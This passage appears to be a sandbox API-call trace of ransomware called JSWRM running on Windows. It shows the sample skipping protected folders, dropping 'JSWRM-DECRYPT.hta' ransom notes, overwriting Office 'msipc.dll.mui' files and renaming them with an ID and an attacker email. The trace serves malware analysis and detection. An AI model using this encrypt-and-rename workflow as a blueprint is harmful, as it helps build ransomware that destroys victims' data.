lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.401] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.401] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.402] CloseHandle (hObject=0x238) returned 1 [0136.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\jswrm-decrypt.hta")) returned 0x20 [0136.402] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47f6c4ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0136.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.402] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47f6c4ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.402] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f6c4ae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47f6c4ae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47f6c4ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.402] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.402] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.402] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.402] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.403] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.403] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.403] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.404] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.404] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.404] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.407] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.407] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.407] CloseHandle (hObject=0x314) returned 1 [0136.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.408] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.409] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0136.409] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fr", cAlternateFileName="")) returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="...") returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="windows") returned -1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="recovery") returned -1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="perflogs") returned -1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="documents and settings") returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="$RECYCLE.BIN") returned 1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="system volume information") returned -1 [0136.409] lstrcmpiW (lpString1="fr", lpString2="msocache") returned -1 [0136.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\jswrm-decrypt.hta")) returned 0xffffffff [0136.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.410] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.410] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.411] CloseHandle (hObject=0x238) returned 1 [0136.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\jswrm-decrypt.hta")) returned 0x20 [0136.411] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47f6c4ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0136.411] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.411] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47f6c4ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.411] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.411] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.411] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f6c4ae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47f6c4ae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47f8f630, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.411] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.411] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.411] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.412] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.412] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.412] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.414] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23192) returned 1 [0136.414] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.414] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5a90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5a90, lpOverlapped=0x0) returned 1 [0136.418] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.418] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5a90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5a90, lpOverlapped=0x0) returned 1 [0136.418] CloseHandle (hObject=0x314) returned 1 [0136.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fr\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fr\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.419] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.419] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0136.419] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa178468, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="gl", cAlternateFileName="")) returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2=".") returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="..") returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="...") returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="windows") returned -1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="recovery") returned -1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="perflogs") returned -1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="documents and settings") returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="$RECYCLE.BIN") returned 1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="system volume information") returned -1 [0136.419] lstrcmpiW (lpString1="gl", lpString2="msocache") returned -1 [0136.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\jswrm-decrypt.hta")) returned 0xffffffff [0136.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 